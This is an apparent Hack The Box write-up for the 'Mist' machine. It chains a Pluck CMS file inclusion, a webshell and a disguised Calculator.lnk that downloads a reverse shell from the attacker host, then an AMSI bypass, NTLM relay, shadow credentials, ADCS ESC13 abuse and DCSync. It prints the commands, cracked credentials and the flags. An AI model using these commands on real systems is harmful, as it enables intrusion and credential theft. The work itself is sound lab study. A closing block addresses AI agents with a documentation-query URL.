# HTB - Mist

## Description Mist is an Insane-difficulty machine that provides a comprehensive scenario for exploiting various misconfigurations and vulnerabilities in an Active Directory (AD) environment. The machine has multiple layers, starting with a public-facing CMS running on Apache with a path traversal vulnerability, allowing us to retrieve a backup file containing hashed credentials. Cracking this hash grants initial access as a low-privileged web user. Exploiting file-write permissions on a shared directory further elevates our access by allowing a reverse shell connection as another domain user. From there, enumeration reveals several AD misconfigurations, including LDAP signing disabled, WebDAV exploitation, and misconfigurations in ADCS templates, each step designed to escalate privileges through different AD entities. The final exploit involves creating shadow credentials to acquire the machine account’s NTLM hash, enabling a `DCSync` attack to obtain the Domain Administrator hash. ## Enumeration **Nmap Scan** ```bash nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan PORT STATE SERVICE 80/tcp open http nmap -sCV -p80 $ip -Pn -oN Nmap/Script-scan PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) ``` **HTTP**

When clicking `admin` word, I was redirected to this login page

The version of `pluck` is `4.7.18`. A quick search of the version in `exploit-db` the site leads to this CVE, but I don't have the admin password yet.

After deep searching for other `pluck` CVEs, I found unauthenticated `LFI`

Vulnerability Details

Following this [post](https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2024-9405) , I have to look under `/data/settings/modules/albums` folder, and I found `admin_backup.php`

When I included `admin_backup.php`, I got a hash, so I will try to crack it

On , I was able to crack it

## Initial Access When I used the cracked password to log in as admin, I was redirected to the admin portal

> Now with the admin password, I can get `RCE` via the CVE we found before I read the exploit and decided to perform it manually rather than using the `poc`. First, Go to `http://10.10.11.17/admin.php?action=installmodule`

Second, create a zip file containing `php` a shell. I will use [P0wny Shell](https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php) and upload it ```bash zip module.zip p0wny.php ```

Finally, access the webshell at `http://10.10.11.17/data/modules/module/p0wny.php`

I will upgrade my shell with [PowerJoker](https://github.com/Adkali/PowerJoker) to get more flexibility because the installed modules don't persist. Maybe there is a script in the background removing them.

## Lateral Movement Looking for internal ports, there are RPC, SMB, and WinRM. That confirms there is firewall rules that prevent most inbound connections to `MS01` ```powershell JokerShell C:\xampp\htdocs\data> netstat -ano | findstr TCP TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 2412 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 852 TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2412 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4 ..snip.. ``` Looking at IP configuration, I found that `MS01` has a different IP `192.168.100.101` with hostname of `ms01.mist.htb` ```powershell JokerShell C:\> ipconfig Ethernet adapter Ethernet: Connection-specific DNS Suffix . : IPv4 Address. . . . . . . . . . . : 192.168.100.101 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.100.100 JokerShell C:\> nslookup ms01 DNS request timed out. timeout was 2 seconds. Server: UnKnown Address: 192.168.100.100 Name: ms01.mist.htb Address: 192.168.100.101 ``` I also wanted to check AV status, So I executed this command `Get-MpComputerStatus` and found that it's already running on the box ```powershell JokerShell C:\Users\svc_web> Get-MpComputerStatus AMEngineVersion : 1.1.24020.9 AMProductVersion : 4.18.24020.7 AMRunningMode : Normal AMServiceEnabled : True AMServiceVersion : 4.18.24020.7 AntispywareEnabled : True AntispywareSignatureAge : 378 AntispywareSignatureLastUpdated : 3/26/2024 4:22:59 AM AntispywareSignatureVersion : 1.407.725.0 AntivirusEnabled : True AntivirusSignatureAge : 378 AntivirusSignatureLastUpdated : 3/26/2024 4:22:59 AM AntivirusSignatureVersion : 1.407.725.0 BehaviorMonitorEnabled : True ``` I want to find possible escalation path on `ms01`, so I uploaded `winpeas.ps1` and `PowerUp.ps1` to the box but since AV is enabled, I had to bypass `AMSI` first. I created a `bypass.ps1` containing common AMSI bypass (patching `amsiScanBuffer`), Then load the `PowerUp.ps1` script ```powershell iex(iwr -UseBasicParsing 10.10.16.4/bypass.ps1) iex(iwr -UseBasicParsing 10.10.16.4/PowerUp.ps1); Invoke-AllChecks ``` Unfortunately, I didn't find any exploitation path with `PowerUp` tool but under `C:\` There is an uncommon folder ```powershell JokerShell C:\> ls Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 3/10/2024 1:50 AM Common Applications d----- 5/8/2021 1:20 AM PerfLogs d-r--- 2/20/2024 5:44 AM Program Files d----- 5/8/2021 2:40 AM Program Files (x86) d-r--- 2/21/2024 12:37 PM Users d----- 3/26/2024 12:02 PM Windows d----- 3/10/2024 3:21 AM xampp JokerShell C:\Common Applications> dir Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/8/2021 1:15 AM 1118 Calculator.lnk -a---- 5/7/2021 3:14 PM 1175 Notepad.lnk -a---- 5/7/2021 3:15 PM 1171 Wordpad.lnk ``` They are `.lnk` files to execute common programs on the system. ```powershell JokerShell C:\Common Applications> type Calculator.lnk L?F?)@%SystemRoot%\system32\shell32.dll,-22531%windir%\system32\win32calc.exef ?-1SPS??XF?L8C???&?m?-1SPSU(L?y?9K????-????%windir%\system32\win32calc.exe%windir%\system32\win32calc.exe ``` What if I can overwrite one of them and add a path to execute a reverse shell when one uses it??. First, I need to check my permission over this folder ```powershell JokerShell C:\> icacls 'Common Applications' Common Applications NT AUTHORITY\SYSTEM:(OI)(CI)(F) MS01\Administrator:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) BUILTIN\Users:(OI)(CI)(RX,W) ``` From the output above, The `BUILTIN\Users` has write access on the folder`(RX,W)`. On my Windows host, I create a new shortcut

On the target field, I put this payload, and inside `rev.ps1` It is an encoded reverse shell ```powershell C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex(iwr -UseBasicParsing 10.10.16.4/rev.ps1) ``` Also, I changed the icon to match `Calculator` icon from `C:\Windows\System32\calc.exe` to make things as real and tricky as possible

Now, I will upload it to the box ```powershell iwr 10.10.16.4/Calculator.lnk -outfile .\Calculator.lnk ``` After a short time (1-2 mins), I got a shell as `brandon.keywarp`

The user is indeed a domain user and it has a profile folder beside other users, too ```powershell JokerShell C:\> whoami /all USER INFORMATION ---------------- User Name SID ==================== ============================================== mist\brandon.keywarp S-1-5-21-1045809509-3006658589-2426055941-1110 JokerShell C:\Users> dir Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 4/8/2025 1:00 PM Administrator d----- 2/20/2024 6:02 AM Administrator.MIST d----- 4/8/2025 1:00 PM Brandon.Keywarp d-r--- 2/20/2024 5:44 AM Public d----- 2/20/2024 9:39 AM Sharon.Mullard d----- 4/8/2025 12:59 PM svc_web ``` I can guess that `Sharon.Mullard` is a domain user, too. At this point, with a domain user, I have to pivot to enumerate the domain controller with [ligolo-ng](https://github.com/nicocha30/ligolo-ng) ```bash ./proxy -selfcert // On Linux Attack Host ``` In a Windows box (`MS01`), Run: ```powershell JokerShell C:\xampp\htdocs> iwr 10.10.16.4/agent.exe -outfile .\agent.exe JokerShell C:\xampp\htdocs> Start-Process agent.exe -ArgumentList "-connect 10.10.16.4:11601 -ignore-cert" ``` > Make sure you're in `C:\xampp\htdocs` because it's excluded from defender After pivoting, I can run `Nmap` and see the results: ```bash nmap -iL ip.txt -F -Pn Nmap scan report for 192.168.100.100 PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds Nmap scan report for 192.168.100.101 PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds ``` Looking for Remote management ports, I found WinRM is running on the two hosts ```bash nmap -iL ip.txt -p5985,3389,5986 --open Nmap scan report for 192.168.100.100 PORT STATE SERVICE 5985/tcp open wsman Nmap scan report for 192.168.100.101 PORT STATE SERVICE 5985/tcp open wsman ``` Script scan for the DC ```bash nmap -sCV -p53,88,135,139,389,445,5985 192.168.100.100 -oN Nmap/dc-scan Nmap scan report for 192.168.100.100 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-08 20:46:19Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mist.htb0., Site: Default-First-Site-Name) | Subject Alternative Name: DNS:DC01.mist.htb 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) ``` I will add the two machines to my `/etc/hosts` file ```bash echo '192.168.100.100 dc01 dc01.mist.htb mist.htb' | sudo tee -a /etc/hosts echo '192.168.100.101 ms01 ms01.mist.htb' | sudo tee -a /etc/hosts ``` My next move is to enumerate both the shared folders and the domain `acls` With Bloodhound, so I will upload `SharpHound.exe` to the host and begin the collection I still couldn't access shared folders with no credentials ```bash nxc smb ip.txt -u 'guest' -p '' --shares SMB 192.168.100.100 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False) SMB 192.168.100.101 445 MS01 [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED SMB 192.168.100.100 445 DC01 [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED nxc smb ip.txt -u '' -p '' --shares SMB 192.168.100.100 445 DC01 [+] mist.htb\: SMB 192.168.100.100 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED SMB 192.168.100.101 445 MS01 [-] mist.htb\: STATUS_ACCESS_DENIED ``` ## Privilege Escalation (MS01) I didn't find anything that can be useful till now, So there is an attack I have to try (`NTLM Relay over LDAP using WebDav)` And this post is useful for performing the attacks: [Post](https://www.hackingarticles.in/lateral-movement-webclient-workstation-takeover/) * I already know what to do, So I will proceed directly with these steps: 1. check if `webdav` is running 2. If `webdav` is not running, try to enable it 3. Using any coercion method (`printerbug`, `PetitPotam`, coercer, etc) to force the machine to authenticate to my host 4. Set up a relay agent on my host to relay the authentication coming from HTTP (`WebDav`) to `LDAP` and perform `RBCD` or `Shadow Credential` Attack Performing `RBCD` depending on having account with `SPN` or ability to create a machine account, but `Shadow Credentials` depends on `PKINIT` authentication (usually when `ADCS` is installed) When I enumerated the domain to see if I can add computer account or not, I found the value of `ms-ds-machineaccountquota` zero, So I can't do it. ```powershell JokerShell C:\xampp\htdocs> Get-DomainObject -Identity "DC=mist,DC=htb" -Properties ms-DS-MachineAccountQuota ms-ds-machineaccountquota ------------------------- 0 ``` When I enumerated the domain to see if I can add computer account or not, I found `msds-keycredentiallink` contains a value, So `Shadow Credential` attack is possible. ```powershell JokerShell C:\xampp\htdocs> Get-DomainObject -Identity MS01 -Properties msds-keycredentiallink msds-keycredentiallink ---------------------- B:828:0002000020000119F0F375256AB2B1C4FC2BDFEFAD0D21AA3D5C36890AED2D7F6FE4F3DAB2C9A62000020F090A50EB5AEE1B926A4341..snip.. ``` Now, Let's deal with `WebDav`, I downloaded `SharpWebClientScanner.exe` to query the its status but I didn't find it to be running on any host, So I have to enable it manually. ```powershell JokerShell C:\xampp\htdocs> .\SharpWebClientScanner.exe --domain mist.htb ?????????????????????????????????????????????????????????????????????????????????????????? ?????????????????????????????????????????????????????????????????????????????????????????? ?????????????????????????????????????????????????????????????????????????????????????????? By Mor David [x] Unable to reach DAV pipe on MS01, system is either unreachable or does not have WebClient service running [x] Unable to reach DAV pipe on DC01, system is either unreachable or does not have WebClient service running [x] Unable to reach DAV pipe on svc_ca, system is either unreachable or does not have WebClient service running ``` I will use this [Tool](https://gist.githubusercontent.com/klezVirus/af004842a73779e1d03d47e041115797/raw/29747c92ca04c844223d1ef6c1463d7e34e271ee/EtwStartWebClient.cs) to enable it from Windows ```bash sudo apt install mono-compelete mcs EtwStartWebClient.cs -out:EtwStartWebClient.exe /unsafe iwr 10.10.16.4:8000/EtwStartWebClient.exe -o .\EtwStartWebClient.exe ``` Verify with `SharpWebScanner`

Then, execute the tool windows ```powershell JokerShell C:\xampp\htdocs> .\EtwStartWebClient.exe [+] WebClient Service started successfully ``` Now, I need to use the coerce method, but I need credentials for it. I only have a shell with a domain user `brandon.keywarp` But with no password or hash. There is one way to get the hash of the user using `ADCS` templates to request a certificate for the user and get their NT hash from it. First, Upload [Certify](https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.5_Any/Certify.exe) to the machine and request a certificate for the current user ```powershell .\Certify.exe request /template:User /ca:DC01\mist-DC01-CA ```

Copy the `cert.pem` (private key & Certificate) , then use this command ```bash openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx ``` With `Certipy`, I can authenticate to the domain and get the hash ```bash certipy-ad auth -pfx cert.pfx -domain mist.htb Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: brandon.keywarp@mist.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'brandon.keywarp.ccache' [*] Trying to retrieve NT hash for 'brandon.keywarp' [*] Got hash for 'brandon.keywarp@mist.htb': aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1xxxxxxxxxxx ``` For WebDav to function, It needs the hostname to connect to, but my host isn't accessible from the internal network, so I will add a port forwarding rule so that any connection that comes to `ms01` . `8888` is forwarded to me at `80` ``` [Agent : MIST\Brandon.Keywarp@MS01] » listener_add --addr 0.0.0.0:8888 --to 0.0.0.0:80 --tcp INFO[8701] Listener 0 created on remote agent! ``` Since we found before that `MS01$` has `keyCredentialLink` value, we need a tool to clear it and add a new one, and this is included in this version of `ntlmrelayx.py` After adding a new feature in this [pull request](https://github.com/fortra/impacket/pull/1402). ```bash git clone https://github.com/fortra/impacket/ && cd impacket; git fetch origin pull/1402/head:mist && git checkout mist; python -m venv . && source ./bin/activate; pip install . && pip install -r requirements.txt && pip install pyOpenSSL==24.0.0 && pip install setuptools ``` Execute the attack ```bash python3 PetitPotam.py -u 'brandon.keywarp' -hashes :db03d6a77a2205bc1d07082740626cc9 MS01@8888/files 192.168.100.101 sudo ntlmrelayx.py -debug -t ldaps://192.168.100.100 -i -smb2support -domain mist.htb ```

```bash nc localhost 11000 $ clear_shadow_creds ms01$ $ set_shadow_creds ms01$ ```

Get a sutiable cert to be used with `certipy` ```bash cert -export -pfx /home/kali/vault/Hacking/Mist/impacket/e1LybMof.pfx -password 'y5hd2VIzZgXcGREYy0uJ' -out cert.pfx Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Writing PFX to 'cert.pfx' ``` Authenticate to the DC using the certificate and get NT hash of the computer account. ```bash certipy-ad auth -pfx cert.pfx -domain mist.htb -username 'MS01$' -dc-ip 192.168.100.100 Certipy v4.8.2 - by Oliver Lyak (ly4k) [!] Could not find identification in the provided certificate [*] Using principal: ms01$@mist.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'ms01.ccache' [*] Trying to retrieve NT hash for 'ms01$' [*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:17749fa7409ac85c4zzzzzzzzzzzz ``` With the computer account hash, I can create a Silver ticket to access the file system as an administrator ```bash impacket-ticketer -nthash 17749fa7409ac85c4zzzzzzzzzzzz -domain mist.htb -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -spn cifs/ms01.mist.htb Administrator export KR5CCNAME=`pwd`/Administrator.ccache ``` Access the machine as an administrator ```bash impacket-wmiexec -k -no-pass MS01.MIST.HTB [*] SMBv3.0 dialect used C:\>whoami mist.htb\administrator ``` I will dump SAM to save my progress ```bash impacket-secretsdump -no-pass -k ms01.mist.htb [*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c40xxxxxxxx::: svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39bxxxxxxxxx::: ``` Connect to the box with a local admin account: ```bash evil-winrm -i ms01 -u Administrator -H 711e6a685af1c31c402xxxxxxxxxxxx *Evil-WinRM* PS C:\Users> type Administrator\Desktop\user.txt ``` > User Flag: 0c63be3b856709838ec62a926dbad528 ## Privilege Escalation (DC01) Inside `Sharon.Mullard` folder, there are several files ```powershell *Evil-WinRM* PS C:\Users\Sharon.Mullard> tree /F C:. +---Desktop +---Documents ¦ sharon.kdbx ¦ +---Downloads +---Favorites +---Links +---Music +---Pictures ¦ cats.png ¦ image_20022024.png ``` The file `.kdbx` is certainly `keepass` password manager, So it will be protected by a password. `Cats.png` has nothing rather than cats images

`image_200222024.png` has something interesting:

A string that's been partially hidden and encoded using `base64` ``` UA7cpa[#1!_*ZX ``` I will attempt it against `keepass` hash to crack it but I think I will need to do a brute force attack using `hashcat`. First, get the hash of `keepass` the database ```bash keepass2john sharon.kdbx > keepass.hash ``` The input in the image was 15 chars and the string I have is 14 chars, So I can only append one `?a` , which means all possible chars in `hashcat` ```bash hashcat -m 13400 -a 3 keepass.hash 'UA7cpa[#1!_*ZX?a' ..snip.. $keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d5871520815f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc:UA7cpa[#1!_xxxxx Session..........: hashcat Status...........: Cracked ``` To open `keepass` file from Linux, I used `keepassxc` ```bash sudo apt install keepassxc keepassxc sharon.kdbx ```

Trying the password for all users I don't have yet, and got one user ```bash nxc ldap dc01 -u users.lst -p 'ImTiredxxxxxxx' LDAP 192.168.100.100 389 DC01 [-] mist.htb\Florence.Brown:xxxxxxxxxxxxxxxxx LDAP 192.168.100.100 389 DC01 [-] mist.htb\Jonathan.Clinton:xxxxxxxxxxxxxxxxx LDAP 192.168.100.100 389 DC01 [-] mist.htb\Markus.Roheb:xxxxxxxxxxxxxxxxx LDAP 192.168.100.100 389 DC01 [-] mist.htb\Shivangi.Sumpta:xxxxxxxxxxxxxxxxx LDAP 192.168.100.100 389 DC01 [-] mist.htb\Harry.Beaucorn:xxxxxxxxxxxxxxxxx( LDAP 192.168.100.100 389 DC01 [+] mist.htb\op_Sharon.Mullard:xxxxxxxxxxxxxxxxx ``` Looking At `bloodhound CE`, User `Op_sharon.mullard` is a member of `operatives` group which can `ReadGMSAPassword` of `Svc_CA$`

```bash ┌─[kali@parrot]─[~/HackTheBox/platform/machines/mist] └──╼ $nxc ldap dc01 -u op_Sharon.Mullard -p 'ImTirxxxxxxxxx' --gmsa LDAPS 192.168.100.100 636 DC01 [*] Getting GMSA Passwords LDAPS 192.168.100.100 636 DC01 Account: svc_ca$ NTLM:09814d63c9baxxxxxxxxxxxx ``` `SVC_CA$` can add `KeyCredentialLink` (Shadow Credential) to `svc_cabackup`

``` certipy-ad shadow auto -u 'svc_ca$@mist.htb' -hashes :09814d63c9baxxxxxxxxxxxx-account svc_cabackup ```

> **ESC13**: If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link. Source [post](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-certificate-services/#esc13-issuance-policy). From `bloodhouno`I can see that being a member of `Certificate Services` group, I can abuse `ESC13` and add myself or anyone I want to `Certificate Managers` group

`Certificate Managers` group is a member of `CA Backup` group

`CA Backup` A group's member can perform `ESC13`, too, and get a membership in `Services acountsthe` group that is a member of `Backup Operators` group.

To summarize the attack path: 1. Perform `ESC13` to inherit the privileges of `Certificate Managers` group 2. Perform `ESC13` inherit the privileges of `Services acounts` group 3. Inherit `Backup Operators` privileges being in `Services acounts` group Request a certificate for the vulnerable template `managerauthentication` ```bash certipy-ad req -u 'svc_cabackup@mist.htb' -hashes :c9872f1bc10bdd522c12fc2ac9041b64 -template managerauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100 ``` Authenticate as `svc_cabackup` to Inherit the new privileges ```bash certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb impacket-ticketConverter svc_cabackup.kirbi svc_cabackup.ccache ```

Request a certificate for the vulnerable template `backupsvcauthentication` ```bash certipy req -u 'svc_cabackup@mist.htb' -k -template backupsvcauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100 -target dc01.mist.htb ``` Authenticate as `svc_cabackup` to Inherit the new privileges ```bash certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb impacket-ticketConverter svc_cabackup.kirbi svc_cabackup2.ccache ```

Abuse `Backup Operator` to backup `Registry` hives ```bash impacket-reg -k -no-pass mist.htb/svc_cabackup@dc01.mist.htb backup -o '\programdata' ``` Access the DC to download the files via winRM ```powershell evil-winrm -i dc01 -u op_Sharon.Mullard -p 'ImTiredOfThisJob:(' *Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> cd C:\programdata *Evil-WinRM* PS C:\programdata> download SAM.save Info: Downloading C:\programdata\SAM.save to SAM.save Info: Download successful! *Evil-WinRM* PS C:\programdata> download SECURITY.save Info: Downloading C:\programdata\SECURITY.save to SECURITY.save Info: Download successful! *Evil-WinRM* PS C:\programdata> download SYSTEM.save Info: Downloading C:\programdata\SYSTEM.save to SYSTEM.save Info: Download successful! ``` Dump the hives' secrets and perform `DCSync` with `dc01$` account hash

impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL

```bash impacket-secretsdump mist.htb/'DC01$'@dc01 -hashes :e768c4cf883a87ba9e96278990292260 -just-dc-ntlm ```

Access the machine as Administrator

> Root Flag: f5dcf7a3f2377ef6759aa413c768303f --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blind0bandit.gitbook.io/blog/windows-machines/insane/htb-mist.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.